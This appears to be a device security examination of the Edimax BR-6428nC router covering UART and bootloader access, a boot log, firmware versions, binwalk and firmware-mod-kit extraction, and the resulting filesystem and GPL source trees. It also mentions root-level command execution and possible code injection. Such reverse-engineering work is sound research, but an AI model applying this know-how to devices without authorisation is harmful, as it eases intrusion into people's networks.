rdisc connect_test.sh Radiusd.sh portscan.sh stcrout.sh reload chmod iwcontrol bridge.sh hex_dec_convert kill /sbin: reboot halt syslogd ifconfig chat route init poweroff logread udhcpc
Note:
/dev/root / squashfs is mounted ro, but /tmp -> /var and /dev are mounted rw as ramfs and can be used for logging or any other temporary storage.Important: The commands are executed with root priviledges.
Physical Intervention
ⓘ Edimax BR-6428nC: N300 Multi-Function Wi-Fi Router
- Edimax BR-6428nC: Main Printed Circuit Board
Front
Back
REALTEK RTL8196E Soc[Datasheet]: Investigated PIN reference
SoC
The main processor, referred to as MCU here, is a REALTEK "RTL8196E" Soc and has a Thin Quad Flat Package (TQFP) with 128 leads on the side. Although this chip has a lead density of 24 leads/cm, it is still possible to hook up to them. This could also be used to intercept other information streams in and out of the MCU. Even if this in itself should not have a security risk in the actual use of the device! The MCU was only examined for the availability of an active UART.
UART
Eventhough the PCB has an UART interface, it is not possible by my knowledge to gain access to the live system. While booting, the input will be disabled once the kernel parameters (root=/dev/mtdblock1 console=0 single) are passed to the OS. It only allows to read the bootlog and access the bootloader. It may be possible to active the UART using code injection.
Bootloader
The RTL8196E's bootloader can be accessed by pressing ESC or the WPS button on boot. Entering "help" or any other command command results in a "Unknown command !" after any try.
ⓘ Edimax BR-6428nC: N300 Multi-Function Wi-Fi Router
Booting... ******************************************************************************** * * chip__no chip__id mfr___id dev___id cap___id size_sft dev_size chipSize * 0000000h 0c22016h 00000c2h 0000020h 0000016h 0000000h 0000016h 0400000h * blk_size blk__cnt sec_size sec__cnt pageSize page_cnt chip_clk chipName * 0010000h 0000040h 0001000h 0000400h 0000100h 0000010h 000004eh MX25L3205D * ******************************************************************************** ---RealTek(RTL8196E)at 2014.09.22-15:02+0800 v0.3 [16bit](380MHz) ---Dram16M_16Mx1_16bit, TRX Timing: [T:16 R:08] P0phymode=01, embedded phy Unknown command ! ls Unknown command ! help Unknown command ! HELP ? Unknown command ! IPCONFIG Unknown command !
Bootlog
Device in router-mode after a basic setup.
ⓘ Edimax BR-6428nC: N300 Multi-Function Wi-Fi Router
Booting... ******************************************************************************** * * chip__no chip__id mfr___id dev___id cap___id size_sft dev_size chipSize * 0000000h 0c22016h 00000c2h 0000020h 0000016h 0000000h 0000016h 0400000h * blk_size blk__cnt sec_size sec__cnt pageSize page_cnt chip_clk chipName * 0010000h 0000040h 0001000h 0000400h 0000100h 0000010h 000004eh MX25L3205D * ******************************************************************************** ---RealTek(RTL8196E)at 2014.09.22-15:02+0800 v0.3 [16bit](380MHz) ---Dram16M_16Mx1_16bit, TRX Timing: [T:16 R:08] decompressing kernel: Uncompressing Linux... done, booting the kernel. done decompressing kernel. Realtek WLAN driver - version 1.6 (2013-02-21) init started: BusyBox v1.11.1 (2015-09-24 13:24:39 CST) starting pid 9, tty '': '-/bin/sh' BusyBox v1.11.1 (2015-09-24 13:24:39 CST) built-in shell (ash) Enter 'help' for a list of built-in commands. /bin/init.sh: /tmp/mssid.txt: line 5: wlan0-va0: not found kill: you need to specify whom to kill Close Wan Interface!! dhcp mtu >> 1500 Initialize WLAN interface >> 2.4G adaptivity enable !! DO 8192E IQK !!!! Done 8192E IQK !!!! [selsect txpower] Normal txpower [txpower] Current Channel : 1 [txpower] Enable Power Table [txpower] CE Power Table [txpower] 11b H->L rate index:4 [txpower] 11g H->L rate index:10 [txpower] 11n20M H->L rate index:10 [txpower] 11n40M H->L rate index:8 [txpower] 40/20M Setup BRIDGE interface ifconfig: ioctl 0x8913 failed: No such device ifconfig: ioctl 0x8913 failed: No such device bridge br0 doesn't exist; can't delete it Setup bridge... DO 8192E IQK !!!! Done 8192E IQK !!!! Static DHCP Leases disable! Setup WAN interface kill: you need to specify whom to kill Close Wan Interface!! >> WAN_MODE is 0 device eth1 is not a slave of br0 device eth0 is already a member of a bridge; can't enslave it to bridge br0. ********************************************************************** * Enable WSC_UPnP * ********************************************************************** ********************************************************************** * Enable LLTD * ********************************************************************** ********************************************************************** * Enable GPIO Interrupt * ********************************************************************** udhcpc (v1.11.1) started into eth1.deconfig Sending select for 192.168.86.40... Lease of 192.168.86.40 obtained, lease time 86400 killall: radiusd: no process killed RADIUS server disable !! ######## eth1.bound ######## cat: can't open '/tmp/pktmask': No such file or directory adding dns 192.168.86.1 route: ioctl 0x890c failed: No such process route: ioctl 0x890c failed: No such process deleting routers route: ioctl 0x890c failed: No such process Notice: caching turned off WiFi Simple Config v2.11-wps2.0 (2012.06.18-11:32+0000). ********************************************************************** * FREE Page,Dentries and Inodes Cache * ********************************************************************** IEEE 802.11f (IAPP) using interface br0 (v1.7) MemFree: 2648 kB Cached: 2204 kB killall: crond: no process killed Time server domain name=pool.ntp.org Time server address=195.186.4.100 boa: server version Boa/0.94.14rc21 boa: server built Sep 24 2015 at 13:24:36. boa: starting server pid=901, port 80 route: ioctl 0x890b failed: File exists route: ioctl 0x890b failed: File exists
Firmware
Current Version
Note: The currently (18. April 2020) the official firmware version is v1.16. But, the version v1.17 is also downloadable.
Despite the fact that v1.17 seems to be the older version, which was created in October 2014 and the versions v.1.15 in Juli 2015 and v1.16 in September 2015.
Known Versions
BR-6428nC:
- v1.17: https://www.edimax.com/edimax/mw/cufiles/files/download/Firmware/BR6428NC_v1.17.zip (Accessed 18. April 2020)
- v1.16: https://www.edimax.com/edimax/mw/cufiles/files/download/Firmware/BR6428NC_v1.16.zip (Accessed 18. April 2020) (To revise CGI Vulnerability.)
- v1.15: https://www.edimax.com/edimax/mw/cufiles/files/download/Firmware/BR6428NC_v1.15.zip (Accessed 18. April 2020)
- v1.07
Note: Search for other available firmware versions: wget https://www.edimax.com/edimax/mw/cufiles/files/download/Firmware/BR6428NC_v1.{0..50}.zip --max-redirect 0
Extraction
ⓘ BR-6428nC v1.16
Warning: Using only
binwalk or dd with unsqushfs was only partwise successfull. See the last approach using firmware-mod-kit for the best extraction option in this scenario.ⓘ Option 1: Basic
binwalk usage.Note: Resulting in an unstructured blob of files. Not all files extracted.
$ binwalk -Mre --dd=".*" BR6428NC_v1.16.bin Scan Time: 2020-04-26 20:46:12 Target File: ./Examination of Edimax devices/BR-6428nC/Firmware/BR6428NC_v1.16/BR6428NC_v1.16.bin MD5 Checksum: 3c06df588aefc9d5d21a9e1e746bf1e2 Signatures: 404 DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 325 0x145 LZMA compressed data, properties: 0x88, dictionary size: 336068608 bytes, uncompressed size: 29696 bytes 465 0x1D1 LZMA compressed data, properties: 0x88, dictionary size: 336068608 bytes, uncompressed size: 29696 bytes 509 0x1FD LZMA compressed data, properties: 0x88, dictionary size: 1048576 bytes, uncompressed size: 65535 bytes 11280 0x2C10 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 2486272 bytes 720896 0xB0000 Squashfs filesystem, big endian, version 2.0, size: 1659674 bytes, 426 inodes, blocksize: 65536 bytes, created: 2015-09-24 05:25:50 [... 7400 more lines of recursive extraction ...] DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 1611576 0x189738 Certificate in DER format (x509 v3), header length: 4, sequence length: 130 2026624 0x1EEC80 Linux kernel version 2.4.18 2034184 0x1F0A08 Unix path: /usr/lib/libc.so.1
ⓘ Option 2: Manually extract and process squaschfs filesystem using
dd then unsquahfs.Note: Non-standard squashfs filesystem could not be extracted
$ binwalk BR6428NC_v1.16.bin DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 325 0x145 LZMA compressed data, properties: 0x88, dictionary size: 336068608 bytes, uncompressed size: 29696 bytes 465 0x1D1 LZMA compressed data, properties: 0x88, dictionary size: 336068608 bytes, uncompressed size: 29696 bytes 509 0x1FD LZMA compressed data, properties: 0x88, dictionary size: 1048576 bytes, uncompressed size: 65535 bytes 11280 0x2C10 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 2486272 bytes 720896 0xB0000 Squashfs filesystem, big endian, version 2.0, size: 1659674 bytes, 426 inodes, blocksize: 65536 bytes, created: 2015-09-24 05:25:50 $ dd if=BR6428NC_v1.16.bin skip=720896 bs=1 of=BR6428NC_v1.16.squashfs 1662978+0 records in 1662978+0 records out 1662978 bytes transferred in 6.229509 secs (266952 bytes/sec) $ file BR6428NC_v1.16.squashfs Squashfs filesystem, big endian, version 2.0, size: 1659674 bytes, 426 inodes, blocksize: 65536 bytes, created: 2015-09-24 05:25:50 $ unsquashfs BR6428NC_v1.16.squashfs Reading a different endian SQUASHFS filesystem on BR6428NC_v1.16.squashfs gzip uncompress failed with error code -3 read_block: failed to read block @0x195226 read_fragment_table: failed to read fragment table block File system corruption detected FATAL ERROR:failed to read file system tables
ⓘ Option 3: Best alternative using the firmware-mod-kit.
$ ./fimrware-extract BR6428NC_v1.16.bin
[Output ommitted]
$ tree ./fmk/
./fmk/
├── image_parts
│ ├── header.img
│ └── rootfs.img
├── logs
│ ├── binwalk.log
│ └── config.log
└── rootfs
├── bin
│ ├── BSrestoreChan.sh
│ ├── QoS.sh
│ ├── Radiusd.sh
│ ├── accessctl.sh
│ ├── alg.sh
│ ├── ash -> busybox
│ ├── auth
│ ├── axhttpd
│ ├── brctl
│ ├── bridge.sh
│ ├── busybox
│ ├── cat -> busybox
│ ├── chmod -> busybox
│ ├── cleanlog.sh
│ ├── connect.sh
│ ├── connect_test.sh
│ ├── cp -> busybox
│ ├── create_l2tp_conf.sh
│ ├── date -> busybox
│ ├── date.sh
│ ├── ddns.sh
│ ├── debugMsg.sh
│ ├── del-route.sh
│ ├── detect_Link.sh
│ ├── dhcpc.sh
│ ├── dhcpd.sh
│ ├── disconnect.sh
│ ├── dnrd
│ ├── dnrd.sh
│ ├── duallaccess.sh
│ ├── echo -> busybox
│ ├── edx_cloud
│ ├── ez-ipupdate
│ ├── ezqos.sh
│ ├── firewall.sh
│ ├── fixedip.sh
│ ├── flash
│ ├── fping
│ ├── getstatus.sh
│ ├── grep -> busybox
│ ├── hex_dec_convert
│ ├── http_proxy.sh
│ ├── hwset.sh
│ ├── iapp
│ ├── igmpproxy
│ ├── init.sh
│ ├── init_ap.sh
│ ├── interrupt.sh
│ ├── intrusion.sh
│ ├── ip -> busybox
│ ├── ipcalc -> busybox
│ ├── iptables
│ ├── ipup.sh
│ ├── iwcontrol
│ ├── iwpriv
│ ├── kill -> busybox
│ ├── killapp.sh
│ ├── l2tp.sh
│ ├── l2tp_2.sh
│ ├── l2tpd
│ ├── lanwanaccess.sh
│ ├── lld2d
│ ├── ln -> busybox
│ ├── ls -> busybox
│ ├── mini_upnpd
│ ├── miniigd
│ ├── miniupnp.sh
│ ├── mkdir -> busybox
│ ├── mknod -> busybox
│ ├── mount -> busybox
│ ├── mssid.sh
│ ├── mssid2.sh
│ ├── multidmz.sh
│ ├── nbnsd
│ ├── nbtscan
│ ├── noip2
│ ├── parentalcontrol.sh
│ ├── pidof -> busybox
│ ├── ping -> busybox
│ ├── pod.sh
│ ├── portfw.sh
│ ├── portscan.sh
│ ├── pppd
│ ├── pppoe
│ ├── pppoe.sh
│ ├── pppoeloop.sh
│ ├── pptp
│ ├── pptp.sh
│ ├── pptpd.sh
│ ├── ps -> busybox
│ ├── radio_on_off.sh
│ ├── rdisc
│ ├── reboot.sh
│ ├── reload
│ ├── remote.sh
│ ├── reset.sh
│ ├── rftest.sh
│ ├── rm -> busybox
│ ├── run_iqv2.sh
│ ├── saveiq.sh
│ ├── savelog.sh
│ ├── sch_reboot.sh
│ ├── scriptlib.sh
│ ├── scriptlib_util.sh
│ ├── sdmzWanCheck.sh
│ ├── seclog.sh
│ ├── setdip.sh
│ ├── setl2tp.sh
│ ├── setpppoe.sh
│ ├── setpptp.sh
│ ├── setsip.sh
│ ├── setssidmac.sh
│ ├── setup
│ ├── sh -> busybox
│ ├── sleep -> busybox
│ ├── sntp.sh
│ ├── sntpclock
│ ├── stcrout.sh
│ ├── syn-flood.sh
│ ├── syslog.sh
│ ├── tc
│ ├── touch -> busybox
│ ├── triggerport.sh
│ ├── txpower.sh
│ ├── txpower_INDIA.sh
│ ├── txpower_V3.sh
│ ├── txpower_select.sh
│ ├── upnp.sh
│ ├── urlblocking.sh
│ ├── urlname.sh
│ ├── vlan.sh
│ ├── vserver.sh
│ ├── wan-status.sh
│ ├── watchdog.sh
│ ├── webs
│ ├── wiz_dhcpc.sh
│ ├── wlan.sh
│ ├── wlan2band.sh
│ ├── wlanScan.sh
│ ├── wlan_scan
│ ├── wlanapp.sh
│ ├── wps.sh
│ ├── wps_Led.sh
│ ├── wps_daemon.sh
│ ├── wpstool -> /bin/wps.sh
│ └── wscd
├── dev
│ ├── log -> /var/dev/log
│ ├── pts
│ ├── ptyp0 -> /var/dev/ptyp0
│ ├── ptyp1 -> /var/dev/ptyp1
│ └── ptyp2 -> /var/dev/ptyp2
├── etc
│ ├── boa
│ │ ├── boa.conf
│ │ ├── boa.passwd
│ │ └── mime.types
│ ├── compiler_date
│ ├── config.bin
│ ├── dnrd
│ │ └── master -> /etc/hosts
│ ├── fstab
│ ├── group
│ ├── host.conf
│ ├── hosts -> /var/hosts
│ ├── icon.ico
│ ├── init.d
│ │ └── rcS
│ ├── inittab
│ ├── iproute2
│ │ ├── rt_dsfield
│ │ ├── rt_protos
│ │ ├── rt_realms
│ │ ├── rt_scopes
│ │ └── rt_tables
│ ├── l2tpd
│ ├── linuxigd -> /var/linuxigd
│ ├── passwd
│ ├── ppp -> /var/ppp
│ ├── ppp.ro
│ │ ├── ip-down
│ │ └── ip-up
│ ├── profile
│ ├── protocols
│ ├── resolv.conf -> /var/resolv.conf
│ ├── resolv1.conf -> /var/resolv1.conf
│ ├── resolv2.conf -> /var/resolv2.conf
│ ├── services
│ ├── simplecfg -> /var/wps
│ ├── simplecfgservice.xml
│ ├── svn_info
│ ├── tmp
│ │ ├── picsdesc.skl
│ │ └── picsdesc.xml
│ ├── udhcpc
│ │ ├── br0.bound
│ │ ├── br0.bound.ga
│ │ ├── br0.deconfig -> /var/udhcpc/br0.deconfig
│ │ ├── br0.leasefail
│ │ ├── br0.sh
│ │ ├── eth0.bound
│ │ ├── eth0.deconfig
│ │ ├── eth0.sh
│ │ ├── eth1.bound
│ │ ├── eth1.deconfig -> /var/udhcpc/eth1.deconfig
│ │ ├── eth1.leasefail
│ │ ├── eth1.sh
│ │ ├── resolv.conf -> /var/udhcpc/resolv.conf
│ │ ├── wlan0-vxd.bound
│ │ ├── wlan0-vxd.deconfig -> /var/udhcpc/wlan0-vxd.deconfig
│ │ ├── wlan0-vxd.sh
│ │ ├── wlan0.bound
│ │ ├── wlan0.deconfig -> /var/udhcpc/wlan0.deconfig
│ │ ├── wlan0.leasefail
│ │ ├── wlan0.sh
│ │ ├── wlan1.bound
│ │ ├── wlan1.deconfig -> /var/udhcpc/wlan1.deconfig
│ │ ├── wlan1.leasefail
│ │ └── wlan1.sh
│ ├── version
│ └── wscd.conf
├── lib
│ ├── ld-uClibc.so.0
│ ├── libc.so.0
│ ├── libcrypt.so.0
│ ├── libdl.so.0
│ ├── libgcc_s_4181.so.1
│ ├── libm.so.0
│ ├── libpthread.so.0
│ ├── libresolv.so.0
│ └── mini_upnp.so
├── linuxrc -> bin/busybox
├── proc
├── sbin
│ ├── chat
│ ├── halt -> ../bin/busybox
│ ├── ifconfig -> ../bin/busybox
│ ├── init -> ../bin/busybox
│ ├── logread -> ../bin/busybox
│ ├── poweroff -> ../bin/busybox
│ ├── reboot -> ../bin/busybox
│ ├── route -> ../bin/busybox
│ ├── syslogd -> ../bin/busybox
│ └── udhcpc -> ../bin/busybox
├── tmp -> /var
├── usr
│ ├── bin
│ │ ├── arping -> ../../bin/busybox
│ │ ├── basename -> ../../bin/busybox
│ │ ├── cut -> ../../bin/busybox
│ │ ├── expr -> ../../bin/busybox
│ │ ├── head -> ../../bin/busybox
│ │ ├── killall -> ../../bin/busybox
│ │ ├── tail -> ../../bin/busybox
│ │ ├── top -> ../../bin/busybox
│ │ ├── tr -> ../../bin/busybox
│ │ └── wc -> ../../bin/busybox
│ ├── lib
│ ├── sbin
│ │ ├── crond -> ../../bin/busybox
│ │ ├── pppd -> /bin/pppd
│ │ └── udhcpd -> ../../bin/busybox
│ └── share
├── var
│ ├── etc
│ │ └── mtab
│ ├── lib
│ │ └── misc
│ ├── lock
│ ├── log
│ │ └── messages
│ ├── run
│ │ └── utmp
│ └── state
│ └── dhcp
│ └── dhcpd.leases
└── web
├── FUNCTION_SCRIPT
├── aIndex.asp
├── aconnected.asp
├── addPC.asp
├── adhcp_fail.asp
├── admin_activeDhcpClient.asp
├── admin_backrestore.asp
├── admin_logs.asp
├── admin_logs2.asp
├── admin_password.asp
├── admin_remotmang.asp
├── admin_restart.asp
├── admin_statistics.asp
├── admin_timezone.asp
├── admin_upgrade.asp
├── adv_alg.asp
├── adv_dmz.asp
├── adv_dos.asp
├── adv_firewal.asp
├── adv_igmp.asp
├── adv_portforward.asp
├── adv_staticrout.asp
├── adv_upnp.asp
├── adv_virtserver.asp
├── adv_wireless.asp
├── advanced_management.asp
├── afail.asp
├── apppoe.asp
├── conclusion.asp
├── conn_test.asp
├── connect_redirect.asp
├── connectmsg.asp
├── detect.asp
├── file
│ ├── allasp-n.var
│ ├── autowan.var
│ ├── javascript.js
│ ├── jquery-1.7.1.min.js
│ ├── multilanguage.var
│ ├── p6.gif
│ └── set.css
├── graphics
│ ├── ap_mode.jpg
│ ├── ap_setup.gif
│ ├── back-a.gif
│ ├── banner.png
│ ├── bg.jpg
│ ├── bg1.jpg
│ ├── cancel.png
│ ├── check.png
│ ├── dot-1.png
│ ├── dot-2.png
│ ├── loading.gif
│ ├── logo.gif
│ ├── no_connect.jpg
│ ├── repeater_mode.jpg
│ ├── repeater_setup.gif
│ ├── router_mode.jpg
│ ├── router_setup.gif
│ ├── step1.jpg
│ ├── step2.jpg
│ ├── step3.jpg
│ ├── step4.jpg
│ └── wifi_24G.png
├── guest_wireless_basic.asp
├── hwsetup.asp
├── index.asp
├── index1.asp
├── inter_ddns.asp
├── inter_wan.asp
├── lan.asp
├── lan_ap.asp
├── last.asp
├── left_list.asp
├── left_list_ap.asp
├── left_list_rep.asp
├── main.asp
├── mdhcp.asp
├── mfail.asp
├── ml2tp.asp
├── mp.asp
├── mpppoe.asp
├── mpptp.asp
├── mstart.asp
├── mstatic.asp
├── msuccess.asp
├── probe.asp
├── qos.asp
├── qosadd.asp
├── redirect.asp
├── replace.asp
├── security_block.asp
├── security_block1.asp
├── set.css
├── setup_3wizard.asp
├── setup_3wizard_1.asp
├── setup_3wizard_2.asp
├── setup_3wizard_3.asp
├── setup_wizard.asp
├── status.asp
├── status_noInternet.asp
├── wifi.asp
├── wireless_access.asp
├── wireless_basic.asp
├── wireless_schedule.asp
├── wireless_wps.asp
├── wisp_wlsurvey.asp
├── wiz_3in1.asp
├── wiz_apmode1.asp
├── wiz_ip.asp
├── wiz_repeatermode1.asp
├── wiz_repeatermode2.asp
├── wizard_security.asp
├── wlClient.asp
├── wlWDS3_key.asp
├── wlWDS4_key.asp
├── wlWDS5_key.asp
└── wlsurvey.asp
GPL Source Code
The GPL Source code is available on the Edimax Product Download section.
ⓘ BR-6428nC GPL v1.16
$ tree -L 3
.
├── 20151006_RTL8196C_Edimax_Edimax_GPL.tar.gz
├── 20151006_RTL8196C_Edimax_Edimax_GPL_md5.txt
├── 20151006_RTL8196C_Edimax_Edimax_GPL_readme.txt
└── RTL8196C_Edimax
├── AP
│ ├── DoApp.sh
│ ├── Edimax_Cloud
│ ├── RTL8196E_1200
│ ├── axTLS
│ ├── boa-0.94.14rc21
│ ├── bridge-utils
│ ├── busybox-1.11.1
│ ├── clockspeed-0.62
│ ├── dnrd-2.20.3_hijack
│ ├── etc.rootfs
│ ├── ez-ipupdate-3.0.10
│ ├── fping-2.4b2_interface
│ ├── hex_dec_convert
│ ├── igmpproxy
│ ├── iproute2-2.4.7
│ ├── iptables-1.3.8
│ ├── iputils
│ ├── l2tpd
│ ├── lltd
│ ├── mkimg
│ ├── nbtscan-1.5.1a
│ ├── netbios
│ ├── noip-2.1.9-1
│ ├── ppp-2.4.2
│ ├── pptp-1.31
│ ├── rp-l2tp-0.4
│ ├── rp-pppoe-3.5
│ ├── script
│ ├── var
│ ├── wget-1.10
│ ├── wireless_tools.25
│ ├── wlan_scan
│ └── xl2tpd-1.2.4
├── BUILD.sh
├── COMPILING-SCRIPT.sh
├── PREPARE.sh
├── RobertGPL1.sh
├── boards
│ └── rtl8196c
├── boot-source
│ ├── bootcode_rtl8196d
│ ├── bootcode_rtl8196d_EdimaxBootUpgrade
│ └── rtl8196c-bootcode-1.0a
├── cleanSvn.sh
├── define
│ ├── PATH_RTL8196E_1200_SDK12L
│ └── usb_support.conf
├── generateGpl1
├── image
│ ├── DoImage.sh
│ ├── Upgrade.sh
│ ├── autoCks.c
│ ├── boot-SPI-16M-16BIT-SDRAM-6228NSv2BootUpgrade
│ ├── boot-SPI-16M-16BIT-SDRAM-6228NSv2BootUpgrade.bin
│ ├── boot-SPI-16M-16BIT-SDRAM-6428NSv2BootUpgrade
│ ├── boot-SPI-16M-16BIT-SDRAM-6428NSv2BootUpgrade.bin
│ ├── mgbin
│ ├── mkimage
│ ├── swapHL
│ └── swapHL.c
├── linux-2.4.18_1200_96E_SDK12L
│ ├── COPYING
│ ├── CREDITS
│ ├── DoLinux.sh
│ ├── Documentation
│ ├── MAINTAINERS
│ ├── Makefile
│ ├── README
│ ├── REPORTING-BUGS
│ ├── Rules.make
│ ├── arch
│ ├── drivers
│ ├── fs
│ ├── include
│ ├── init
│ ├── ipc
│ ├── kernel
│ ├── lib
│ ├── mk
│ ├── mm
│ ├── net
│ ├── rtk_voip
│ ├── rtkload
│ └── scripts
├── porting_sdk.txt
├── set_app_defined.sh
├── set_compiler_condition.sh
└── toolchain
├── clean-space
├── rtl8196c-toolchain-1.1.tar.gz
└── tools